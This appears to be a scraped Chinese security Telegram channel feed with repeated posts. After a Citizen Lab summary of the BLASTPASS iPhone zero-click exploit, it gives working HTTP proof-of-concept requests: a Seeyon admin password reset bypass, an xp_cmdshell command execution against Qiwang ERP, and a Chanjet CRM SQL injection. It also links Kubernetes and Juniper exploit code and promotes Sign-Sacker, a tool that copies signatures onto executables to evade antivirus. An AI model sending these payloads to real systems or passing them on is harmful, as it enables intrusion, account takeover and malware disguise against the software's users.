BLASTPASS NSO集团iPhone零点击,0day 漏洞在野外捕获
上周,而检查由华盛顿特区的民间社会组织与国际办事处雇用的个人的设备,公民实验室发现了一个积极利用零点击漏洞被用来提供NSO集团的飞马雇佣军间谍软件。
BLASTPASS漏洞利用链
我们将漏洞利用链称为BLASTPASS。该漏洞链能够在受害者没有任何交互的情况下危及运行iOS最新版本(16.6)的iPhone .
所涉及的漏洞帕斯卡附件包含从攻击者iMessage Account发送给受害者的恶意图像。
我们期望在未来发布一个更详细的关于漏洞利用链的讨论。
https://citizenlab.ca/2023/09/blastpass-nso-group-iphone-zero-click-zero-day-exploit-captured-in-the-wild/
上周,而检查由华盛顿特区的民间社会组织与国际办事处雇用的个人的设备,公民实验室发现了一个积极利用零点击漏洞被用来提供NSO集团的飞马雇佣军间谍软件。
BLASTPASS漏洞利用链
我们将漏洞利用链称为BLASTPASS。该漏洞链能够在受害者没有任何交互的情况下危及运行iOS最新版本(16.6)的iPhone .
所涉及的漏洞帕斯卡附件包含从攻击者iMessage Account发送给受害者的恶意图像。
我们期望在未来发布一个更详细的关于漏洞利用链的讨论。
https://citizenlab.ca/2023/09/blastpass-nso-group-iphone-zero-click-zero-day-exploit-captured-in-the-wild/
Apple Developer Documentation
Building a Pass | Apple Developer Documentation
Build a distributable pass.
❤7👍7🔥1
致远 短信验证码绕过重置密码漏洞 POC
POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1 Host: ip:port
Content-Type: application/json
Accept-Encoding: gzip
{"loginName":"admin"}
POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1 Host: ip:port
Content-Type: application/json
Accept-Encoding: gzip
{"loginName":"admin"}
👍16❤2👏1
👍21❤4🔥4👏3😁2👎1
企望ERP系统 RCE
POST /mainFunctions/comboxstore.action HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
comboxsql=exec%20xp_cmdshell%20'whoami'
POST /mainFunctions/comboxstore.action HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
comboxsql=exec%20xp_cmdshell%20'whoami'
👍10❤5
Kubernetes 中的命令注入漏洞-CVE-2023-3676
https://github.com/akamai/akamai-security-research/tree/main/PoCs/CVE-2023-3676
https://github.com/akamai/akamai-security-research/tree/main/PoCs/CVE-2023-3676
❤5
Sign-Sacker(签名掠夺者):一款数字签名复制器,可将其他官方exe中数字签名,图标,详细信息复制到没有签名的exe中,作为免杀,权限维持,伪装的一种小手段。
https://github.com/langsasec/Sign-Sacker
https://github.com/langsasec/Sign-Sacker
GitHub
GitHub - langsasec/Sign-Sacker: Sign-Sacker(签名掠夺者):一款数字签名复制器,可将其他官方exe中数字签名,图标,详细信息复制到没有签名的exe中,作为免杀,权限维持,伪装的一种小手段。
Sign-Sacker(签名掠夺者):一款数字签名复制器,可将其他官方exe中数字签名,图标,详细信息复制到没有签名的exe中,作为免杀,权限维持,伪装的一种小手段。 - langsasec/Sign-Sacker
👍6❤4😁2
Juniper 防火墙RCE
非常有意思的一个漏洞
Juniper 防火墙使用Appweb Web 服务器。当Appweb调用CGI脚本时,它会传递各种环境变量和参数,以便脚本可以访问用户的HTTP请求。HTTP 请求的正文通过 stdin 传递。受影响的防火墙运行 FreeBSD,每个 FreeBSD 进程都可以通过打开/dev/fd/0. 通过发送 HTTP 请求,我们能够/dev/fd/0向系统引入一个“文件”。
https://github.com/vulncheck-oss/cve-2023-36845-scanner
细节
https://vulncheck.com/blog/juniper-cve-2023-36845/
非常有意思的一个漏洞
Juniper 防火墙使用Appweb Web 服务器。当Appweb调用CGI脚本时,它会传递各种环境变量和参数,以便脚本可以访问用户的HTTP请求。HTTP 请求的正文通过 stdin 传递。受影响的防火墙运行 FreeBSD,每个 FreeBSD 进程都可以通过打开/dev/fd/0. 通过发送 HTTP 请求,我们能够/dev/fd/0向系统引入一个“文件”。
https://github.com/vulncheck-oss/cve-2023-36845-scanner
细节
https://vulncheck.com/blog/juniper-cve-2023-36845/
❤9👍9
畅捷CRM get_usedspace.php SQL注入漏洞 poc
GET /WebSer~1/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20CONCAT(0x7178767671,0x5664726e476a637a565a50614d4c435745446a50614756506d486d58544b4e646d7a577170685165,0x7171626b71)-- HTTP/1.1
Host: x.x.x.x
GET /WebSer~1/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20CONCAT(0x7178767671,0x5664726e476a637a565a50614d4c435745446a50614756506d486d58544b4e646d7a577170685165,0x7171626b71)-- HTTP/1.1
Host: x.x.x.x
👍17❤12